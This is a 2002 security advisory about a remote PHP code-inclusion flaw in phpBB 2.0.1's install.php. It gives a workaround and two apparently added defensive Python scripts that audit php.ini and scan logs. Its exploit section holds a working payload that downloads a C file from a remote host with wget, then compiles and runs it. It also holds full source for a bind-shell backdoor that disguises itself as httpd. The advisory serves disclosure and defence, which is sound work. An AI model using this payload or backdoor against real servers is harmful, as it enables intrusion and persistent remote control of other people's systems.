[UNIX] Malicious PHP Source Injection in phpBB (install.php)

From: support@securiteam.com
Date: 06/18/02


From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 18 Jun 2002 20:05:09 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Malicious PHP Source Injection in phpBB (install.php)
------------------------------------------------------------------------

SUMMARY

phpBB is one of the most popular PHP bulletin board systems. When both
"allow_url_fopen" and "register_globals" are set to "On" in php.ini, the
install.php script shipped with phpBB contains a vulnerability that allows
attackers to inject malicious PHP code into existing web pages.

DETAILS

Vulnerable systems:
 * phpBB 2.0.1

Workaround:
Set "allow_url_fopen" to "Off" and "register_globals" to "Off". After you
have completed the installation process, remove or rename the install.php
script. Alternatively, modify install.php as follows:

Find:

define('IN_PHPBB', true);
$phpbb_root_path='./';

Replace it with just:
$phpbb_root_dir='./';
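The two php.ini directives above are the whole precondition for this bug, so a defender's first check is whether they are actually Off on the host and whether install.php is still present. The script below is an added example, not part of the advisory or of phpBB: it parses a php.ini fragment (the sample fragment is constructed), reports either directive that is On, and checks for a leftover install.php under an assumed phpBB root. Treating a missing directive as On is a deliberately conservative assumption, since older PHP 4 builds defaulted both to On.

```python
"""Audit php.ini for allow_url_fopen / register_globals and check for a
leftover install.php, per the workaround in this advisory.

Added example, not part of the original advisory or of phpBB itself.
Assumptions: standard `directive = value` php.ini syntax; a missing
directive is treated as On (conservative); paths are illustrative.
"""
import os
import re
from typing import Dict, List

# Directives the advisory says must be Off for the workaround to hold.
REQUIRED_OFF = ("allow_url_fopen", "register_globals")

# Values PHP accepts as boolean true in php.ini.
_TRUTHY = {"1", "on", "true", "yes"}

_LINE_RE = re.compile(r"^\s*([A-Za-z_.]+)\s*=\s*(.*?)\s*$")


def parse_php_ini(text: str) -> Dict[str, str]:
    """Return a {directive: raw value} map, ignoring comments and section
    headers. Later assignments override earlier ones, as PHP does."""
    settings: Dict[str, str] = {}
    for line in text.splitlines():
        stripped = line.split(";", 1)[0].strip()  # ';' starts a comment
        if not stripped or stripped.startswith("["):
            continue
        m = _LINE_RE.match(stripped)
        if m:
            settings[m.group(1).lower()] = m.group(2).strip('"\'')
    return settings


def ini_bool(value: str) -> bool:
    """Interpret a php.ini value the way PHP does for boolean directives."""
    return value.strip().lower() in _TRUTHY


def audit_ini(text: str) -> List[str]:
    """Return one finding per directive that is On; empty means both are Off."""
    settings = parse_php_ini(text)
    findings: List[str] = []
    for key in REQUIRED_OFF:
        # Assumption: an absent directive is treated as On, the unsafe case.
        raw = settings.get(key, "On")
        if ini_bool(raw):
            findings.append(f"{key} is On (value {raw!r}); set it to Off")
    return findings


def leftover_install_script(phpbb_root: str) -> bool:
    """True if install.php still exists under the given phpBB root."""
    return os.path.isfile(os.path.join(phpbb_root, "install.php"))


# Constructed sample php.ini fragment: allow_url_fopen explicitly On and
# register_globals missing, so both are reported.
SAMPLE_INI = """
[PHP]
; Fopen wrappers
allow_url_fopen = On
display_errors = On
"""

if __name__ == "__main__":
    for finding in audit_ini(SAMPLE_INI) or ["php.ini: no findings"]:
        print(finding)
    # Hypothetical phpBB root; adjust to the real install location.
    if leftover_install_script("/var/www/phpBB2"):
        print("install.php is still present; remove or rename it")
```

Run it against the real php.ini (for example by reading the file into `audit_ini`) after applying the workaround; a clean result is an empty findings list and `leftover_install_script` returning False.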

Example:
Create the following file:
--------------------includes/functions_selects.php--------------
<? passthru("uname -a"); ?>
-----------------------------------------

And then type in the following URL:
http://URL/install.php?phpbb_root_dir=http://MYBOX/

This will result in output similar to:
Linux cpu 2.4.18-686 #1 Sun Apr 14 11:32:47 EST 2002 i686 unknown
Warning: Cannot add header information - headers already sent by (output
started at http://host/includes/functions_selects.php:1) in
/home/morris/public_html/tmp/phpBB2/includes/sessions.php on line 182

Warning: Cannot add header information - headers already sent by (output
started at http://host/includes/functions_selects.php:1) in
/home/morris/public_html/tmp/phpBB2/includes/sessions.php on line 183

Warning: Cannot add header information - headers already sent by (output
started at http://host/includes/functions_selects.php:1) in
/home/morris/public_html/tmp/phpBB2/install.php on line 346
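The request shown above leaves a distinctive trace in the web server's access log: an include-path parameter (here phpbb_root_dir) whose value is a remote URL. The script below is an added example, not part of the advisory or of phpBB, that scans Apache combined-format log lines for that pattern. The log lines are constructed, and the set of parameter names is an assumption to extend with the include-path variables of other applications you host.

```python
"""Flag requests that pass a remote URL in a query parameter the application
uses as an include path (the install.php / phpbb_root_dir pattern).

Added example, not part of the original advisory or of phpBB. Log lines are
constructed; INCLUDE_PARAMS is an assumption to extend per application.
"""
import re
from typing import Iterable, List, NamedTuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Query parameters this advisory shows being used as an include root.
INCLUDE_PARAMS = {"phpbb_root_dir", "phpbb_root_path"}

# Apache/NCSA combined log format, only the fields we need.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Schemes PHP's URL fopen wrappers will fetch when allow_url_fopen is On.
_REMOTE_SCHEMES = ("http://", "https://", "ftp://")


class Hit(NamedTuple):
    ip: str
    timestamp: str
    script: str
    param: str
    value: str
    status: int


def is_remote_include(value: str) -> bool:
    """True if the (possibly still URL-encoded) value names a remote URL."""
    v = unquote(value).strip().lower()
    return v.startswith(_REMOTE_SCHEMES)


def scan_line(line: str) -> List[Hit]:
    """Return one Hit per include-path parameter carrying a remote URL."""
    m = _LOG_RE.match(line)
    if not m:
        return []  # not a combined-format line; skip rather than guess
    parts = urlsplit(m.group("target"))
    hits: List[Hit] = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in INCLUDE_PARAMS and is_remote_include(value):
            hits.append(Hit(m.group("ip"), m.group("ts"), parts.path,
                            name, unquote(value), int(m.group("status"))))
    return hits


def scan_log(lines: Iterable[str]) -> List[Hit]:
    """Scan every line and collect all hits."""
    return [hit for line in lines for hit in scan_line(line)]


# Constructed sample lines: a benign install visit, an attempt with the URL
# percent-encoded (flagged), and a local-path value (not remote, not flagged).
SAMPLE_LOG = [
    '203.0.113.9 - - [18/Jun/2002:20:05:09 +0200] '
    '"GET /phpBB2/install.php HTTP/1.0" 200 5120',
    '198.51.100.7 - - [18/Jun/2002:20:06:41 +0200] '
    '"GET /phpBB2/install.php?phpbb_root_dir=http%3A%2F%2F198.51.100.7%2F HTTP/1.0" 200 812',
    '198.51.100.7 - - [18/Jun/2002:20:07:02 +0200] '
    '"GET /phpBB2/install.php?phpbb_root_dir=./ HTTP/1.0" 200 5120',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit.timestamp} {hit.ip} {hit.script} "
              f"{hit.param}={hit.value} (status {hit.status})")
```

A 200 status on a flagged request means the remote include was served rather than rejected, which is the case to treat as a likely compromise of the host; a 404 or 403 after install.php was removed or renamed is the expected outcome of the workaround.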

Exploit:
The following exploit code will download a C file, compile it, execute it,
and cause a backdoor to open up on the remote server.

PHP code:
<? passthru("cd /tmp && /usr/bin/wget http://host/a.c && gcc a.c -o ... &&
rm /tmp/a.c && /tmp/... "); ?>

Backdoor code:
/*
 * Unknown author.
 */

#define PORT 13534
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;

int main (int argc, char *argv[])
{
    int i;
    for(i=0;i<argc;i++) {
      memset(argv[i],'\x0',strlen(argv[i]));
    };
    strcpy(argv[0],"/usr/local/apache/bin/httpd");

    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (soc_des == -1)
        exit(-1);
    bzero((char *) &serv_addr, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    serv_addr.sin_port = htons(PORT);
    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr,
sizeof(serv_addr));
    if (soc_rc != 0)
        exit(-1);
    if (fork() != 0)
        exit(0);
    setpgrp();
    signal(SIGHUP, SIG_IGN);
    if (fork() != 0)
        exit(0);
    soc_rc = listen(soc_des, 5);
    if (soc_rc != 0)
        exit(0);
    while (1) {
        soc_len = sizeof(client_addr);
        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr,
&soc_len);
        if (soc_cli < 0)
            exit(0);
        cli_pid = getpid();
        server_pid = fork();
        if (server_pid != 0) {
            dup2(soc_cli,0);
            dup2(soc_cli,1);
            dup2(soc_cli,2);
            execl("/bin/sh","sh",(char *)0);
            close(soc_cli);
            exit(0);
        }
    close(soc_cli);
    }
}

ADDITIONAL INFORMATION

The information has been provided by Morris Chang
<mailto:onlooker@cnun.xsdeny.net>.
